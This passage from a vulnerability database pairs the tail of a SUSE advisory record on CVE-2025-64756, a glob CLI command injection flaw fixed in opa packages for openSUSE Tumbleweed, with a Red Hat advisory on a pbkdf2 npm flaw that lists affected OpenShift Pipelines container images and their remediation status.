"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-1.11.0-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-1.11.0-1.1.aarch64"
},
"product_reference": "opa-1.11.0-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-1.11.0-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-1.11.0-1.1.ppc64le"
},
"product_reference": "opa-1.11.0-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-1.11.0-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-1.11.0-1.1.s390x"
},
"product_reference": "opa-1.11.0-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-1.11.0-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-1.11.0-1.1.x86_64"
},
"product_reference": "opa-1.11.0-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-bash-completion-1.11.0-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.aarch64"
},
"product_reference": "opa-bash-completion-1.11.0-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-bash-completion-1.11.0-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.ppc64le"
},
"product_reference": "opa-bash-completion-1.11.0-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-bash-completion-1.11.0-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.s390x"
},
"product_reference": "opa-bash-completion-1.11.0-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-bash-completion-1.11.0-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.x86_64"
},
"product_reference": "opa-bash-completion-1.11.0-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-fish-completion-1.11.0-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.aarch64"
},
"product_reference": "opa-fish-completion-1.11.0-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-fish-completion-1.11.0-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.ppc64le"
},
"product_reference": "opa-fish-completion-1.11.0-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-fish-completion-1.11.0-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.s390x"
},
"product_reference": "opa-fish-completion-1.11.0-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-fish-completion-1.11.0-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.x86_64"
},
"product_reference": "opa-fish-completion-1.11.0-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-zsh-completion-1.11.0-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.aarch64"
},
"product_reference": "opa-zsh-completion-1.11.0-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-zsh-completion-1.11.0-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.ppc64le"
},
"product_reference": "opa-zsh-completion-1.11.0-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-zsh-completion-1.11.0-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.s390x"
},
"product_reference": "opa-zsh-completion-1.11.0-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-zsh-completion-1.11.0-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.x86_64"
},
"product_reference": "opa-zsh-completion-1.11.0-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-64756",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64756"
}
],
"notes": [
{
"category": "general",
"text": "Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c \u003ccommand\u003e \u003cpatterns\u003e are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:opa-1.11.0-1.1.aarch64",
"openSUSE Tumbleweed:opa-1.11.0-1.1.ppc64le",
"openSUSE Tumbleweed:opa-1.11.0-1.1.s390x",
"openSUSE Tumbleweed:opa-1.11.0-1.1.x86_64",
"openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.aarch64",
"openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.ppc64le",
"openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.s390x",
"openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.x86_64",
"openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.aarch64",
"openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.ppc64le",
"openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.s390x",
"openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.x86_64",
"openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.aarch64",
"openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.ppc64le",
"openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.s390x",
"openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64756",
"url": "https://www.suse.com/security/cve/CVE-2025-64756"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:opa-1.11.0-1.1.aarch64",
"openSUSE Tumbleweed:opa-1.11.0-1.1.ppc64le",
"openSUSE Tumbleweed:opa-1.11.0-1.1.s390x",
"openSUSE Tumbleweed:opa-1.11.0-1.1.x86_64",
"openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.aarch64",
"openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.ppc64le",
"openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.s390x",
"openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.x86_64",
"openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.aarch64",
"openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.ppc64le",
"openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.s390x",
"openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.x86_64",
"openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.aarch64",
"openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.ppc64le",
"openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.s390x",
"openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-27T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-64756"
}
]
}
RHSA-2025:22905
Vulnerability from csaf_redhat - Published: 2025-12-09 10:09 - Updated: 2026-06-06 13:19A flaw was found in the npm pbkdf2 library, allowing signature spoofing. When executing in javascript engines other than Nodejs or Nodejs when importing pbkdf2/browser, certain algorithms will silently fail and return invalid data. The return values are predictable, which undermines the security guarantees of the package.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x | — | ||
